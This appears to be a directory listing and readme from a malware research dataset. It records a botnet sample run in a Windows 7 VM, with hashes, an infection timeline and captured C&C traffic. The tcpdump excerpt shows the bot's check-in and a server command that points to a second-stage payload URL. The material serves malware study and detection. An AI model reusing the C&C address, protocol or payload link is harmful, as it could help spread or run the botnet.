Index of /publicDatasets/CTU-Malware-Capture-Botnet-171-1

	Name	Last modified	Size	Description
	Parent Directory		-
	775b7139d05281094ab6434378770483.exe.zip	2016-04-05 19:39	724K
	2016-05-04_capture-win7.biargus	2016-08-05 12:48	99M
	2016-05-04_capture-win7.binetflow	2016-08-05 12:48	65M
	2016-05-04_capture-win7.capinfos	2016-08-05 12:44	762
	2016-05-04_capture-win7.dnstop	2016-08-05 12:42	2.5K
	2016-05-04_capture-win7.html	2016-08-05 12:48	730K
	2016-05-04_capture-win7.json	2016-08-05 12:48	814K
	2016-05-04_capture-win7.passivedns	2016-08-05 12:42	11K
	2016-05-04_capture-win7.pcap	2016-07-12 07:31	133M
	2016-05-04_capture-win7.rrd	2016-07-12 07:31	8.0M
	2016-05-04_capture-win7.tcpdstat	2016-09-03 16:45	1.8K
	2016-05-04_capture-win7.weblogng	2016-08-05 12:44	604
	README.html	2017-01-13 14:20	2.4K
	README.md	2016-05-01 12:19	1.7K
	bro/	2017-08-31 09:45	-
	do3aqb.gifv.zip	2016-08-05 12:42	277K
	fast-flux-dga-first-analysis.txt	2017-01-13 14:20	6.4K

Description

• Probable name: SAPE.Heur?
• MD5: 775b7139d05281094ab6434378770483
  
• SHA1: 106f65043a9480b41cf97214f746b5eb032e9651
  

• SHA256: b52dfce5f89a429888f35bf530eb9efc6d24431f606f1a98795ee13f2c9b1c79

• VirusTotal
• HybridAnalysis

• RobotHash

Timeline

Tue Apr 5 00:01:51 CEST 2016

stared win7

Tue Apr 5 00:03:41 CEST 2016

infected

After 13 hours, it successfully connected to the C&C server

Tue Apr 5 19:36:50 CEST 2016

I started the calculator program by hand. To see if the C&C reflects this new process.

Analysis

13:59:39.079194 IP 10.0.2.107.50424 > 77.81.104.169.14221: Flags [P.], seq 15:293, ack 1, win 64240, length 278 CONNECT=P4CK3T=FUCKBOY-9686316^{$^56^$}11:50:22^{$^[taskmgr] Windows Task Manager^$}WIN7^{$^Microsoft Windows 7 Ultimate 32-bit Desktop^$}1.5^{$^04-05-2016^$}N/A^{$^425d804aa328d98d348f6474b46b914630d5fdfe4b686b3d93ce1a54ef43c3a1^$}FUCKBOY^{$^N^$}8_=_8

13:59:39.847525 IP 77.81.104.169.14221 > 10.0.2.107.50424: Flags [P.], seq 1:157, ack 293, win 65535, length 156 C=P4CK3T=1TR4MPanq=()=4TR4MPSTOP=()=6TR4MPN=()=9TR4MP20408|13101|10472|48206|78356|78674|49580|64029|=()=10TR4MPhttp://files.catbox.moe/do3aqb.gifv=()=8_=8SEARCHLOGS=P4CK3T=paypal8=_8

We downloaded this file from outside the vm. do3aqb.gifv

Sun May 1 12:15:24 CEST 2016

I restarted after several weeks to see if the malware activates again. It came alive again! So we will wait...